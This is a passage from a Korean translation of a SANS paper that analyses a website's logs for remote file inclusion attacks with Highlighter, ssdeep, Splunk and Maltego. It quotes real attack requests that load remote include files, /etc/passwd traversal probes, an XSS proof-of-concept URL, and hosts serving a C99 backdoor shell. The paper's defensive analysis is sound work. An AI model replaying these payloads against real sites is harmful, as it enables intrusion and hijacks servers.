2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 14

그림 10: 대량 SQL 인젝션피해자로부터리다이렉트된가짜백신 제공된바이너리를다운로드하여바이러스토털에서분석하면예상되로 Crypt.XPACK/Kryptik( 가짜백신 ) 으로탐지되었다. 바이너리를호스팅하는도메인 failsafetyperfomancecenter.info과 on-linelowcustodian.info의조회는각각 176.53.20.58과 77.79.10.13의 IP 주소가나온다. 이 IP에대해서검색쿼리해보면 Russian Business Network의한부분으로, 블랙리스트에포함된동유럽악성코드전파자로나온다. 176.53.20.58의경우는 urlquery를통해알수있듯이 (urlquery, 2012), AS42926 Redora Hosting에속한다. 3.2 Remote File Inclusion 공격 또다른최근 Imperva 연구인 Hacker Intelligence Initiative, Monthly Trend Report #8 Remote and Local File Inclusion Vulnerabilities 101은 해커들이좋아하는 원격파일포함 (RFI) 공격에대한상세내용을제공한다 (Imperva, 2012). 이 Imperva 보고서는 RFI( 와 LFI) 공격의해부, 진화뿐만아니라완화방법도논한다. Imperva 연구와동일한발견사항을논하는것보다, 여기에는 RFI 공격에대한구체적인내용을다룬다. 공격및피해애플리케이션둘 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 15

다관련있는통계데이터를생성하면서구체적인방법을이용해서 holisticinfosec.org 를 대상의해킹공격을분석한다. 초점은다시웹로그로부터모든정보를수집하여인터넷 백그라운드공격활동을분석한다. 3.2.1 하이라이터 (Highlighter) 맨디언트는 RFI 공격분석을위한완벽하고, 분석가가패턴을파악할수있도록설계된로그분석그래픽구성요소를제공하는로그파일분석도구인하이라이터 ( 하이라이터 ) 1.1.3을제공한다. 개발자들에따르면, 하이라이터는분석가들이무관한데이터와관련데이터를분별할수있는많은기능을제공한다. 로그검토방법을향상시킬수있는새롭고흥미로운방법은굉장히가치있으며, holisticinfosec.org 로그자료는 RFI 공격에대해서하이라이터도구를시험해볼수있는최상의탐지시나리오로입증되었다. 하이라이터는주로보안분석가및시스템관리자를위해설계된무료유틸리티로서분석하는동안에로그데이터에대해세가지관점을제공한다 : 1. 텍스트보기 : 사용자가흥미있는키워드를강조하고 안전한 콘텐츠를필터링할수있다. 2. 그래픽, 전체내용보기 : 사용자가인터페이스를통해동적으로수정할수있는이미지로렌더링되는모든콘텐츠와파일의전체구조를보여준다. 3. 막대그래프보기 : 다른텍스트뷰어 / 편집기에서사용할수없는것과는달리유용한메타데이터로시험관을제공하고사용패턴은시각적으로분명하게되는시간이지남에따라파일에서패턴이표시된다. 하이라이터프로젝트개발자인제드미튼과제이슨러트젠츠는이연구를위해하이라이터의세부사항을제공했다. 하이라이터 1.0은 2009년도에세인트루이스의 DC3에서거의모든기능과함께처음발표되었으며, UI는내부 ( 즉맨디언트 ) 피드백에의하여만들어졌다. 1.1.3 버전은몇몇버그리포트를제출한맨디언트포럼사용자로부터많은도움을받았다. 제이슨과제드는긴밀히협력하면서가능한업무시간이끝난후자유시간에하이라이터를개발하하였다. 제드는그가좋아하는큰파일리더중의하나로서이벤트로그 ( 윈도우이벤트등 ), 메모리덤프에서텍스트출력값 ( 특히, 메모리이미지에서 ASCII 출력값 ) 을조사하는데사용하는등상당히평범하게하이라이터의사용법을설명한다. 큰파일리더인하이라이터는필요에따라수백 MB 파일을보기위해디스크로부터읽지만이로인해메모장, NP++, 텍스트패드등이다운된다. 제드의새로운 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 16

사용사례는웹로그에서초기악성 IP 주소를발견하고공격자가노리는파일을알아내고, 하이라이트개요패널을관찰하여이전에알려지지않은악의적으로행동하는사람을추가적으로발견하는기능을사용하는것이다. 하이라이터개발로드맵은사용자커뮤니티에서주도를한다. 향후에는강조하는다중문서 ( 여러문서에대한하나의압권세트 ) 하이라이팅기능을포함하는것이다. 개발자는다음두가지중하나가구현되는것을보고싶어한다 : 1. 바이너리읽기, 임의의날짜형식, 임의의로그형식을구현하거나 2. 프레임워크구현 / 통합하여커뮤니티에서하이라이터의다양한기능을추가할수 있는플러그인을개발할수있도록하는것 설치는맨디언트하이라이터 1.1.3.msi를실행하고, 기본설정값을따르면된다. 패턴인식은하이라이터의핵심기능으로, 데이터를필터링하고축소하는동안데이터가강조하는흥미로운면을강조한다. 이연구를위해 2011년 6월부터 2012년 4월까지의 HolisticInfoSec.org의웹로그를이용하여 1,091,692 로그라인을유용한공격유형으로줄이는방법을시연한다. 하이라이터는.log,.txt와.csv 등텍스트파일과함께사용하도록설계되었다. 모든로그파일의내용을클립보드로복사하고 File -> Import from Clipboard 클릭또는 File -> Open -> File 을선택하고, 선택한로그파일을선택한다. 하이라이터는또한 Mandiant Intelligent Response(MIR) 에의해만들어진문서와함께동작한다 ; 상용제품사용자는또한하이라이터가가치있다는것을알수있다. 로그파일이로드되면, 하이라이터사용을위한오른쪽마우스컨텍스트메뉴가기본적인기능드라이버가된다. 한번설치되면, 하이라이터사용자가이드 PDF 파일은시작메뉴에서 Mandiant -> Highlighter 아래에포함된다. HolisticInfoSec.org 로그들은현재사용되는색깔 ( 하이라이터가의도된 ) 에서 RFI 공격을포함한예상되는모든웹애플리케이션공격시도를나타낸다. 공격들이모두이곳에서밝혀질것이다. RFI 공격을분석하는동안공격자들은공격시도과정에서공통인클루드 (include) 파일을이용하는것이명백하게드러난다. 일반적인예는 fx29id1.txt이며전형적인로그항목은다음과같다 : 85.25.84.200 - - [14/Aug/2011:20:30:13-0600] "GET ////////accounts/inc/include.php?language=0&lang_settings[0][1]= http://203.157.161.13//appserv/fx29id1.txt? HTTP/1.1" 404 2476 "-" "Mozilla/5.0" 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 17

holisticinfosec.org-aug-2011.log는하이라이터에서로드되고, fx29id1.txt는키워드검색필드에서쿼리되었다. 여덟줄이탐지되었다. 그림 11에서보여지는것과같이그래픽보기로결과들이강조된텍스트를스크롤하고텍스트보기를정렬할수있다. 그림 11: 강조된 RFI 키워드 여덟개의항목각각검토한결과, 각각의로그에 HTTP 404 에러코드가로그로남아있는것을보니 RFI 시도가실패한사실을확인하였다. 또한여덟개의항목은모두 85.25.84.200으로부터왔다. 따라서 85.25.84.200은강조되었고마우스오른쪽이클릭되었고 Show Only가선택되었다. 이결과는 85.25.84.200을포함한전체에서 15개의항목만볼수있도록제한한다. Jed가대부분설명하였듯이, 85.25.84.200으로부터다른불법행위가발견되었을뿐만아니라, 다른 IP들로부터다른유사한공격패턴이있다. 또다른마우스오른쪽클릭한후 Pre-Defined -> Apache Log 다음에 Field Operations -> Set Delimiter를선택하였다. 마지막으로마우스오른쪽을클릭하여 Field Operations -> Parse Date/Time을선택하면그림 12와같이히스토그램을볼수있다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 18

그림 12: 시간별이벤트보여주는막대그래프 상관관계에대한또다른것에태그를붙이는동안에필드를강조하고싶은사용자는상단도구모음에서 Cumulative 체크박스를반드시선택해야한다. 가장최근의강조된세트에대해서강조된필드로이동하려면, 사용자는이전의 p 단축키와다음의 n 단축키를활용할수있다. 단축키는 File -> Edit Hotkeys를통해정의할수있고, 사용자가이드에잘정의되어있다. 강조된것을관리하기위해서는, 아마도누적되는강조된한세트를삭제할수있다. 이경우텍스트 UI에서오른쪽마우스클릭후 Highlights -> Manager를선택하면, 그림 13에서보여지는것처럼당신이삭제하길원하는하이라이트를체크한다. 그림 13: 하이라이터관리자 Imperva 의 Hacker Intelligence Summary Report Remote File Inclusion 에 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 19

설명하였듯이 많은 RFI 공격은다른공격벡터와함께상호배치되었다. 예를들어, 디렉토리추적은응용프로그램의 RFI 취약점을식별하는데사용되었다 (Imperva, 2011). 이러한사례는 Holisticinfosec.org 로그에나타나고하이라이터로발견될수있다. 하이라이터퀵을사용하여, <script>, select, union, onmouseover 등과같은키워드검색을통해 holisticinfosec.org 로그에대한크로스사이트스크립팅과 SQL 인젝션에대한간단한검사를실시하였다. 그러나거의발견되지않았다. 그러나 2011년 8월에대한 96,427개의로그에대해 /etc/password 키워드검색과관련된 10개의디렉토리추적시도가발견되었다. 이것은매우제한된쿼리이지만그것자체 ( 다른타겟기회는끝이없다 ) 로중요한점을증명하고있다. 디렉토리추적시도가성공하지않았다는것을확인하기위해서는, 이전의모든강조된것을삭제하고 Highlight 기능을사용한후처음발견된로그중에서 /etc/passwd%00을수동으로선택하였다. 강조된라인중하나를오른쪽마우스클릭하고 Show Only를사용하면예상된 10개의결과만을아래로 UI로줄여준다. Highlight 다음에마우스를끌어서 404 오류를선택하였다. 이 10개의모든항목이 404 오류만보여주고있다는것을확인할수있었다. 즉그림 14에서보여주는것과같이성공적인시도는없다. 그림 14: 하이라이터쿼리축소 대용량파일처리는하이라이터의강력한기능이다. 2.44GB Swatch 로그파일을로드할때, 파일로딩및형식화에약간의시간이걸렸지만하이라이터가성능저하를겪거나실패없이 24,502,412 로그항목을훌륭하게처리했다. 특정 inode에대한쿼리가실행되었고, 하이라이터는 10분안에 25만개이상의라인전체에 1,930번의히트수를태그하였다. 3.2.2 RFI 추출물 SANS Internet Storm Center 침해사고대응가인 Rob Danford 는변조되지않은아파치 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 20

로그로부터 RFI 공격을잡기위해 2008년에펄스크립트 (RFI 추출물로써여기에언급된 ) 를만들었다. 이솔루션은정규표현식을이용하여로그의좌측값 ( 단순측면에서, 파라미터입력의왼쪽으로부터 ) 을줄이고, RFI 공격시도를표현하는부분에대한파라미터입력값이후의 URL을비교할수있도록정리하였다. 다음은 2011년 11월의전체 holisticinfosec.org 로그항목은다음과같다 : 211.202.2.42 - - [01/Nov/2011:11:10:15-0600] "GET/content/view/184/45/index.php?_REQUEST=&_REQUEST%5boption%5 d=com_content&_request%5bitemid%5d=1&globals=&mosconfig_absolute _path=http://www.veterantudm.org.my/databases/fpclass/logon.txt?? HTTP/1.1" 403 583 "-" "libwww-perl/5.79 11 월의전체로그에대해 perl rfi-extract.pl -e -f holisticinfosec.org-nov-2011 를실행한후, RFI 추출물출력파일은다음과같다. "01/Nov/2011:11:38:43-0600","211.202.2.42", "http://www.veterantudm.org.my/databases/fpclass/logon.txt" Logon.txt는공격자가 mosconfig_absolute_path 파라미터를통해 원격으로인클루드 를시도했던파일을나타낸다. RFI 추출스크립트는저자의이메일주소를통해요청할수있다. 추출스크립트는리눅스에서실행하는것이쉽다. 우분투 / 데비안시스템의의존사항을설치하려면 sudo apt-get install libdate-calc-perl libfile-tail-perl을입력한다. 이들의존성은윈도우에서실행하는펄도만족해야한다. 위 perl rfi-extract.pl -e -f holisticinfosec.org-nov-2011 명령어에서, -e 플래그는스크립트가 RFI URL만추출하는것이고 f 플래그는원했던로그파일을호출한다. 전체로그에서 RFI-extract 를이용해서 RFI 시도로그로만줄여서 ssdeep과 Splunk와같은다른도구와함께훨씬더효과적으로분석할수있다. 3.2.3 Ssdeep RFI 공격중에서하나의공통점이코드재사용이다. 피해자와공격자가서버에서공격스크립트를확인한후, 연구자들은유사성을확인할수있다. 다시 Imperva의 2011년 5월보고서 (Imperva, 2011) 는 포함된스크립트파일의유사한복사본으로다른서버해킹에사용된다. 라고지적하고있다. 이것은 holisticinfosec.org 로그항목과 Ssdeep을사용하여증명될수있다. Jesse Kornblum의 Ssdeep은 context triggered piecewise hashes(ctph) 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 21

또는퍼지해시를계산하는데사용된다. 퍼지해시는 입력값이동일한순서로일련의동일한바이트가지고있는것이며, 이중시퀀스중간의바이트는컨텐트및길이에서다를수있다. 는동질성을가지고입력값을비교할수있다. 동질성에대한근거는여기에서중요하다. 버클리대학의 Understanding Evolution 웹사이트에따르면, 진화론은공통된조상에서파생된유사성을공유하는유기체들과관련되는것을예측한다. 관계성으로인한유사한특성은동질성으로알려져있다. (Various, 2006). 이이론은 RFI 코드재사용의분석을위한증거로사용된다. 2012년 2월에 holisticinfosec.org 로그에서 RFI 추출물을활용하여, 겉으로관련없는공격시도로부터인클루드파일을 sdeep으로조사한다. 다음의두개의 RFI 추출출력항목은포함시도를한 URL을나타낸다. 1) "04/Feb/2012:20:45:09-0700","78.13.62.1", http://eurosystems.it/conf_commerciale/images/tid.gif 2) "24/Feb/2012:17:35:45-0700","86.125.219.12", "http://www.salimhome.com/bsxc//ipays.jpg" 소스 IP 주소는이탈리아와루마니아로부터, 인클루드파일도메인은각각이탈리아와중국에서호스팅되고있다. 이러한사실은포함된파일에전혀관계가없는것처럼보이지만, 인클루드파일인 tid.gif와 ipays.jpg 사이에, ssdeep은다르게해석한다. RFI 공격에자주사용되는전술중하나는스크립트파일을속이기위해이미지파일확장자를사용하여탐지를피하고, 필터링을우회한다. Ssdeep 소스코드재사용기능을활용하기위해각각포함한파일을비슷하게명명된 eurosystem 및 salimhome 디렉토리에배치되었다. Ssdeep l 플래그는파일이름의상대경로를사용하고, -r 플래그는재귀모드를설정한다. 따라서 ssdeep lr eurosystems > eurosystems.txt는 eurosystems 디렉토리에파일에대한퍼지해쉬값을계산한다. 그다음 tid.gif의해쉬값과 ipay.jpg의해쉬값을계산하기위해, ssdeep lrm eurosystems.txt salimhome 을실행한다. 사용자들은 v를추가하여상세사항을볼수있고, a를추가하여 0에도불구하고점수를만들수있다 : D:\malwareAnalysis\RFI\current>ssdeep -lrm eurosystems.txt salimhome salimhome\ipays.jpg matches eurosystems.txt:e (90) (90) 으로표현된점수는 0 에서 100 사이의가중치이며, 파일의유사성이높을수록숫자가 높아진다. 동질성의이론으로되돌아가서살펴보면 관련된생물은공통된조상으로부터 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 22

파생되는유사성을공유할것이다 에따라, 이연구는명확하게 tid.gif와 ipays.jpg 사이에상당한유사성이있다는것을나타낸다. 실제파일의검토해보면두파일은 c99 inkektor v1 06.2008의복사본이며, ipays에의해재코딩및수정되었다. C99 inkektor는 Backdoor:PHP/C99shell 버전으로피해서버에원격악의적인사용자접근을허용하는 PHP 스크립트다. 두버전모두 sh_mainurl 파라미터아래 http://kraksaans.co.cc가선언되었고, c99ssh의업데이트를위해 http://www.utama-audio.com/ipays/ 를호출했다. 하지만이메일파라미터는 ipays.jpg는 matiostore@gmail.com 으로 tid.gif는 czber@yahoo.com 로다르게정의되었다. 3.2.4 Splunk 다행히독자는이미 Splunk와기능에대해서잘알고있기를바란다. Splunk에대한소개자료가필요하면, Splendid Splunk : Unifying Events with Splunk 를추천한다. 이것은 ADMIN 잡지의 2010년 6월판에발표되었다. 이번연구를위해서, Splunk 인스턴스로 2개의인덱스를만들었다. 첫번째인덱스 holisticinfosec은 2011년 6월에서 2012년 4월까지 holisticinfosec.org의가공되지않은아파치로그로 1,091,692 개의로그가있다. 두번째인덱스인 RFI 추출물은 HOLISTICINFOSEC에서인덱스된동일한원시로그값에대해서 3.2.2절에서언급된 RFI-extract를실행하여얻은결과만을포함한다. 이색인은 3,871 개의로그가있다. Splunk 사용자가 index= rfi-extract iplocation table IPv4, City, Country top Country와같이쿼리를수행할수있도록 IP 위치기능이포함되어있다. 결과는전체로그항목의비율에의한국가, 개수, 그리고순위를포함하는테이블이다. RFI-extract 인덱스에대한쿼리를실행하면, 소스 IP 주소출처에대해서국가별많은곳에서적은순으로반환한다. 이같은쿼리로직은피해자의지리적분포를알아낼때도실행될수있다. 만약에 Splunk가원래기능이없다면, Splunk 사용자가인덱스된데이터로부터필드를추출해야할수있다. 예를들어, RFI-extract 인덱스데이터로부터 URL을쿼리하기위해서 index= rfi-extract 를실행한다. 그림 15에서와같이, 첫번째결과에서아래쪽화살표버튼은클릭되고추출필드가선택되었다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 23

그림 15: Splunk 추출물필드 전체 URL이 Example로복사되고, Generate가선택되었다. 해당필드에대해정규식은자동으로생성되고, 선호하는필드이름으로저장하면된다. 여기서는 URL을필드이름으로사용하였다. 새롭게정의된필드를이용한쿼리는 index= rfi-extract top url 이다. 그림 16에서보여지는것처럼, 결과는로그항목의순서로선정되고 RFI 공격시도의일부분으로 URL은대부분포함될것이다. 그림 16: RFI 도메인 그림 10에나타난도메인중하나를분석해보면, 재미있는결과는다수의관련여러소스 IP들이있으며, 이것은 holisticinfosec.org 에동일한파일을원격으로포함하려고하는많은공격자가있다는것을의미한다. 소스 IP인 211.202.2.42와 95.50.243.50는각각 http://www.dedi24.com/galerie/bilder/thumbs/logon.txt라고불리는총 44회호출하였다. http://rebro.sk/juraj/counters/logon.txt를활용하는 200회의원격파일포함공격시도중에서, dedi24.com 도메인이포함된공에서알려진 203.71.2.73을포함하여 6개의서로다른소스 IP들이확인되었다. 이들 6개 IP 주소는아래의 3.2.5 절에서공통점을위해분석된다. 3.2.5 RFI 분석과통계 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 24

위에서언급한방법을통해인터넷백그라운드공격의전제로수집된데이터를연결하기위해서는추가적인분석단계가필요하다. 이번실습은그림 17에서보여지는것처럼 2012 4월 12일부터가공하지않는 holisticinfosec.org 로그항목을가지고시작할것이다. 그림 17: 가공하지않은 RFI 시도로그항목 RFI 추출을통해동일한로그가아래와같이줄어든다 : "12/Apr/2012:20:05:39-0600", "184.107.208.242", http://wordpress.com.scemuss.cl/tim.php 아래의존재하지않는매개변수를통해원격으로 http://wordpress.com.scemuss.cl/tim.php 를 포함하기위해소스 IP 184.107.208.242( 캐나다 ) 로부터공격시도는있었다 : /toolsmith//dfd_cart/app.lib/product.control/core.php/customer.ar ea/customer.browse.list.php?set_depth=?src= 그림 9 에서보여지는것처럼 404 에러를통해공격시도가실패한것으로나타나고, toolsmith 디렉토리는단순히 PDF 파일을호스팅한다. 또한 CL 도메인은칠레진원지 사이트를의미하지만 ThePlanet(74.55.98.74) 인미국에서호스트된다. 공통적이기때문에, RFI 공격시도에서포함된파일은공격소스 IP 주소와는완전히다른위치에서호스트된다. 이공격시도는아이러니를가지고있다. 첫째, 파일이름 tim.php 를확인해라. 최근 발표된대량의 RFI 공격은가짜백신을제공하기위해워드프레스 TimThumb 이미지 크기를조정하는스크립트 (timthumb.php) 에대한공격을포함하고있다 (Goodin, 2011). 그러나비록도메인이름 wordpress.com.scemuss.cl 은정말다른것이라고암시하지만, tim.php 를호스팅하는서버는줌라 (Joomla) 인스턴스를실행하고있다. 이것은아마도 공격자가피해자시스템에 tim.php 파일을안전한것으로위장하기위한시도로보인다. 둘째, 공격시도는 Dragon Frugal 의 PHP 쇼핑카드스크립트인 DFD Cart(dfd_cart) 에대한 참조를포함하고있다. DFD Cart 는 Secunia Advisory SA26920(Secunia, 2007) 을통해 2007 년에여러개의파일포함취약점을있었다고알려졌다. 그림 9 의로그항목안에 포함된것으로보여지는 app.lib/product.control/core.php 디렉토리안에 2007 개의 발견사항에대한취약한모든스크립트가위치해있었다. 그러나더아이러니한것은 저자가 DFD Cart 웹사이트 (DragonFrugal, 2010) 에서공지되고, Secunia Advisory 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 25

SA38635(Secunia, 2010) 을통해발표된다른 DFD Cart 취약점을발견하였다는것이다. RFI 공격자는검색엔진로직을이용해서 holisticinfosec.org에발표된 DFD Cart 보안권고문을발견하였다고결론낼수있다. 그러나동적기능이없는전혀관련없는정적디렉토리를대상으로파일포함공격시도가있었다. 대신공격자는공격이실패하였고, 피해자는패치를하지않은상황에서이번발견사항은정말의도하지않고인터넷백그라운드공격을대표할수있는교과적인사례가되었다. 공격도구설정오류 를포함하는 2.2절의 IBR/IBA 정의에서보면, 위에서사용된 RFI C&C 설정은기껏해야제한된공격대상을선택하는것이고, 최악의경우완전히설정오류이다. PHP 스크립트 tim.php는스팸메일발송스크립트인 PHP:Mailer-K이며, 악성코드분석워크스테이션으로다운로드되었다. wordpress.com.scemuss.cl에대한루트디렉토리를열거해보니, tim.php를호스팅하는서버는 aa.php와 setf.php 스크립트도호스팅하고있었다. HTML 스크립트로잘못명명된 (PHP가아님 ) 이두스크립트는그림 18에서보여지는것처럼 tim.php 메일발송로직을이용하는데사용되기위해동일한웹폼이었다. 그림 18: 액션에서 PHP 메일러 그림 12 에서보여지는것과같이메일러는잘동작하며발송하면대상이메일주소의스팸 폴더에즉시도착한다. 즉 SmartScreen 필터의의심메일에대한표준을만족한다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 26

그림 19: PHP 메일러결과 인터넷공격의계속반복되는형태중하나인스팸을전파하기위해 RFI 공격이피해자호스트를해킹하는것을고려하면, 이것도인터넷백그라운드공격의근거가된다. 몇달동안 IBA와같은활동과연관되어있다는것을찾기위해소스 IP 184.107.208.242에대해서검색엔진쿼리를수행할필요가있다. 프로젝트허니팟은 URL을사용하여익스플로이트 / 삽입시도로인해금지 : /forum/timthumb.php?src=http://wordpress.com.scemuss.cl/tim.php. (Teschner3, 2012) 라고기술하고있다. 즉위에언급했듯이공격자는명확하게 TimThumb 인스턴스를타겟으로했다. 통계를위해원시데이터로돌아와서, 섹션 3.2.4로부터 Splunk 쿼리는많은흥미로운사항을발견하였다. 그림 20에서는소스 IP의지리적분포를국가별로카운트하여보여준다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 27

그림 20 그러나, 공격을입은사이트 ( 인클루드파일을호스팅하는사이트 ) 의국가별도메인의지리적 분포를보면그림 21 에서보여지는것과같이공격자들의지리적분포와비교해서 재미있는유사성및차이점을보여준다. 그림 21 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 28

두데이터모두독일, 폴란드뿐만아니라미국이가장공격출처로가장높은반면, 유사성은여기서끝난다. 인도네시아, 슬로바키아공화국 (SK) 그리고말레이시아에서 호스팅된피해자사이트는인클루드공격시도에서굉장히높은것을보여준다. 한가지 흥미로운사이트는슬로바키아공화국 (rebro.sk) 의서버는추가분석이필요할것으로 보인다. 앞에서설명하였듯이 IBR/IBA 을발생시키는요인중의하나는 네트워크서버설정 오류, 서비스그리고다양한다른소프트웨어프로그래밍버그들 의결과로서비정형적인 행위이다. 위에서언급한 Splunk 쿼리로식별되는피해자의사이트에서공격시도에포함된 많은 URL 을검토할때는, 비정형적인행위를추가분석하기위해하나의사이트가 선택되었다. 그림 22 와 23 에서보여지는것처럼 http://marcel.rebro.sk/main.php?act=scan&dir=/var/ 를통한디렉토리 추적 ( 종종 RFI 공격과관련된 ) 취약점과 http://marcel.rebro.sk/main.php?act=scan&dir="><script src=http://holisticinfosec.org/js/pleasefixme.js></script> 을통한크로스 사이트스크립팅 (XSS) 취약점이바로언급되었다. 이러한취약점은사이트운영자에게 보고되고, 패치하겠다는답을받았다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 29

그림 22: 디렉토리추적 그림 23: 크로스사이트스크립팅 디렉토리추적은확실히서버설정오류나소프트웨어프로그래밍버그범주에서 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 30

발생한다. 그리고 XSS는실제로소프트웨어결함이다. 이러한취약점을인해해킹될수있는웹애플리케이션은 RFI나 SQL 인젝션과같은더심각한공격을받을수있다. 피해서버에서발견된추가적인애플리케이션취약점은 OWASP 10대취약점의 A1 인젝션과 A6 보안설정오류에포함된다. 2011년 11월에 holisticinfosec.org에대한로그에서확인된하나의사이트는 Exploit.E107-1로 ClamAV에의해발견된인클루드파일을호스팅하였다. E107은널리사용되는콘텐츠관리시스템 (CSM) 웹애플리케이션이다. include 파일경로는 http://www.akouavie.com/components/con_virtuemart/os.txt 이었다. 이시나리오의실제피해애플리케이션은취약한 Joomla( 또다른인기있는 CMS) 애드온으로, 이것은 VirtueMart로써알려진쇼핑카드애플리케이션이다. rebro.sk의데이터뿐만아니라이러한발견사항들은가장많이 RFI 공격을당하는웹애플리케이션은 Joomla, 워드프레스및 E107이라는사실을말해준다. IBA 패턴조사를위한마지막전술은 Maltego를통한관계분석이다. Maltego는 IPv4 주소, 도메인이름, 이메일주소, 그리고소셜네트워크그룹핑과같은많은유용한항목사이에관계와연결성을결정할수있는프로그램이다. 이러한관계는트랜스폼이라는매핑를통해서가능하다 (Pateva, 2012). 섹션 3.2.4에논의된데로, 6개의소스 IP 주소는원격으로 HolisticInfoSec 웹사이트에서 http://rebro.sk/juraj/counters/logon.txt를포함하도록하는공격시도가확인되었다. 이 IP 주소, 75.98.226.74, 210.127.253.168, 209.235.192.243, 69.16.226.84, 203.71.2.73, 그리고 211.202.2.42는 Maltego 작업공간에 IPv4 주소항목에입력하였다. 어떤개체가가장많이들어오는 ( 공유되는 ) 관계를보여줄를결정하기위해처음에는 All Transforms을선택한다. 그림 24에서이해하기힘든결과를보여준다. 그림 24 : 모든변환은통제하기힘든것을증명한다. 모든개체를포함하여그래프에서너무많은결과를보여주므로, 변환선택을해서모든여섯개의 IP에서 www.ipfraudrepoter.com으로접속한결과인 Other Transforms 그룹핑에서 To Website where IP appears(using Search Engine) 로크기를줄인다. 그결과그래프가너무작아서읽을수가없었다. 잘보게하기위해 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 31

www.ipfraudrepoter.com 개체를선택해서, 마우스오른쪽버튼을클릭하면 Copy to New Graph -> Copy with Neighbors -> Parents -> 5 로처리되었다. 결과는그림 25에서도보여지는것처럼 www.ipfraudrepoter.com과발견된웹사이트개체내용의정보와의관계를공유하기위해여섯개의 IP 주소를보여주는그래프가되었다. 그림 25: 유해한 IP 관계 분명히 holisticinfosec.org 로그에서발견된 RFI 공격에연관된여섯개의 IP는또한비인가접근과 SQL/ 코드인젝션을포함한유사한동작이탐지된다른로그항목에서도언급되었다. 하나는 Maltego를이용해서관계의가치를쉽게알수있다. 이러한결과는더깊은분석을통해많은사람들이굉장히가치있는것으로생각하고있다. 4. 결론 이번연구의목적은인터넷백그라운방사에대한학문적연구로부터파생된인터넷백그라운드공격이굉장히펴져있고, 모든웹애플리케이션은아니더라도대부분의로그에서발견할수있는일정한공격패턴이라는것을보여주기위해서이다. 3.1 대량 SQL 인젝션공격에서조사된것처럼, ASP, ASP.net, 그리고 ColdFusion과같은일반적인웹 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 32

애플리케이션플랫폼은적절히유지되고, 방어가되지않으면자동화된, 대량의 SQL 인젝션공격을당한다. 해킹이되면웹애플리케이션자체의해킹뿐만아니라방문자도피해를입어자바스크립트로인해다른악성사이트로리다이렉트된다. Log Parser를기반으로특정로그분석도구를이용하면분석가들은대량의로그에대해서 SQL과같은쿼리이점을이용할수있고, 불법행위에대해쉽고빠르게분석할수있다. 3.2 원격파일포함 (RFI) 공격에서다뤘듯이, PHP 애플리케이션도 RFI 공격의형태로자동화된트래픽으로부터끝임없이공격을당한다. 이공격방법은 SQL 인젝션공격못지않게피해가크며, 피해사이트수는적을수있지만, 피해웹애플리케이션을완전히해킹할수있어피해는더클수있다. 하이라이터 (Highlighter), Splunk, 그리고 Maltego 등의도구를통해분석가는방어력를개선하는지속적인패턴과측정을도출할수있다. Imperva, SpiderLabs 에서제공하는것뿐만아니라여기에서도출된데이터를고려하면, 웹애플리케이션으로가는측정가능한비율의트래픽은악의적으로공격하는것이라는것을알수있다. 인터넷백그라운드공격을위한기준으로악성트래픽으로인한비생산적트래픽및비정형행위의속성뿐만아니라, 네트워크서버설정오류, 서비스및공격도구설정오류를이용하면, 방어와유지보수역량을확실히향상시킬수있다. 도구및방법으로무장하여웹로그렌즈를통해이러한공격을보는분석가들은개선사항을강화할수있다. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 33

5. 참조 Burnett, M. (2010, November 02). Forensic log parsing with microsoft's logparser. Retrieved from http://www.symantec.com/connect/articles/forensic-log-parsingmicrosofts-logparser Danchev, D. (2012, May 08). [Web log message]. Retrieved from http://ddanchev.blogspot.com/2012/05/dissecting-ongoingclient-sideexploits.html DragonFrugal. (2010). Version 1.2 and greater have security fixes related to secunia.com's security advisory sa38635. Retrieved from http://www.dragonfrugal.com/open.source/software/dfdcart/ Giuseppinni, G., & Burnett, M. (2004). Log parser toolkit. (p. 2). Rockland, MA:Syngress. Goodin, D. (2011, November 02). Thousands of wordpress sites commandeered by black ole. Retrieved from http://www.theregister.co.uk/2011/11/02/wordpress_mass_compromise/ Imperva. (2011). Hacker intelligence summary report remote file inclusion. Hacker Intelligence Initiative, Monthly Trend Report #1 Imperva. (2012). Remote and local file inclusion vulnerabilities 101. Hacker Intelligence Initiative, Monthly Trend Report #8 Imperva. (2012). Automation of attacks. Hacker Intelligence Initiative, Monthly Trend Report #9 Kornblum, J. (2011, September 30). Fuzzy hashing and ssdeep. Retrieved from http://ssdeep.sourceforge.net/ McRee, R. (2012). Toolsmith: Log parser lizard. ISSA Journal, 10(4), 37-39. Pang, R., Yegneswaran, V., Barford, P., Paxson, V., & Peterson, L. (2004). In A.Lombardo(Chair). Characteristics of internet background radiation. In Proceedings of the 4th ACM SIGCOMM (pp. 27-40). New York, NY:Association for Computing Machinery. Hofman, M. (2011, December 01). Sql injection attack happening atm. Retrieved from http://isc.sans.edu/diary.html?storyid=12127 Paterva. (2012). Maltego. Retrieved from http://www.paterva.com/web5/client/overview.php 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 34

Secunia. (2007, September 24). Secunia advisory sa26920 dfd cart "set_depth" multiple file inclusion vulnerabilities. Retrieved from http://secunia.com/advisories/26920/ Secunia. (2010, March 03). Secunia advisory sa38635 dfd cart cross-site scripting and cross-site request forgery vulnerabilities. Retrieved from http://secunia.com/advisories/38635 Stuttard, D. (2011). Download burp suite. Retrieved from http://portswigger.net/burp/download.html Stuttard, Dafydd & Pinto, Marcus. The Web Application Hacker s Handbook. Indianapolis, IN: Wiley Publishing Company. Teschner3, T. (2012, March 19). Banned due to exploit/injection 